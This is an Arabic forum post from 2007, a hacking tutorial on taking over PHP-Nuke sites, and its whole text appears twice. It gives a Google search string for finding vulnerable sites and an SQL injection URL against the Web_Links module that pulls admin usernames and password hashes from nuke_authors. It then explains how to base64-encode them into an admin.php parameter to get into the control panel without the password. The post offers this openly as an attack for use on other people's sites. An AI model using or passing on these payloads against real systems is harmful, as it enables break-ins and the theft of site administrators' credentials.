هكر بني حسن
20/10/2007, 04:25 AM
بسم الله الرحمن الرحيم
اختراق مجله nuke
طبع الثغره قديمه وفعاله الى الان
الثغره من نوع sql-injection
في هذا المره مش راح نشفر وطبعا بستطاعتك التشفير والحصول على الباس
ولاكن احنا راح نقوم بتحويل اسم المستخدم والباس المشفر الى base64
ومن ثم الحصول على تصريح لدخول الى لوحه التحكم الدمن
يالله نبدأ الرجاء الحار متابعه الصور جيدا وعدم وضع اسئله سخيفه
طريقه البحث قوقلي
اكتب الكود الاتي
كود:
in url :"modules.php?name=Web_Links"
الصوره الاولى
هنا قمت بوضع الكود الاتي والحصول على اسم المستخدم الي هو الادمن رقم واحد
modules.php?name=Web_Links&l_op=viewlink&cid=2%20UNION%20select%20counter,%20aid,%20pwd%20F ROM%20nuke_authors%20-- \\logins
الصوره الثالثه
هنا نقوم بتحويل الاسم والباس الى base64
وتستطيع عمل ذالك على اي موقع توجد به هذه الخدمه او اي برنامج
username:md5
الصوره الرابعه
هنا قمت بأضافه الكود الناتج الي هوbase64
بعد الوصله و admin.php?admin=base64
وسوف تكون في قلب لوحه التحكم ان شاء الله
طبعا هنا موقع اخر لانو الاول في مشكله في لوحه التحكم
اختراق مجله nuke
طبع الثغره قديمه وفعاله الى الان
الثغره من نوع sql-injection
في هذا المره مش راح نشفر وطبعا بستطاعتك التشفير والحصول على الباس
ولاكن احنا راح نقوم بتحويل اسم المستخدم والباس المشفر الى base64
ومن ثم الحصول على تصريح لدخول الى لوحه التحكم الدمن
يالله نبدأ الرجاء الحار متابعه الصور جيدا وعدم وضع اسئله سخيفه
طريقه البحث قوقلي
اكتب الكود الاتي
كود:
in url :"modules.php?name=Web_Links"
الصوره الاولى
هنا قمت بوضع الكود الاتي والحصول على اسم المستخدم الي هو الادمن رقم واحد
modules.php?name=Web_Links&l_op=viewlink&cid=2%20UNION%20select%20counter,%20aid,%20pwd%20F ROM%20nuke_authors%20-- \\logins
الصوره الثالثه
هنا نقوم بتحويل الاسم والباس الى base64
وتستطيع عمل ذالك على اي موقع توجد به هذه الخدمه او اي برنامج
username:md5
الصوره الرابعه
هنا قمت بأضافه الكود الناتج الي هوbase64
بعد الوصله و admin.php?admin=base64
وسوف تكون في قلب لوحه التحكم ان شاء الله
طبعا هنا موقع اخر لانو الاول في مشكله في لوحه التحكم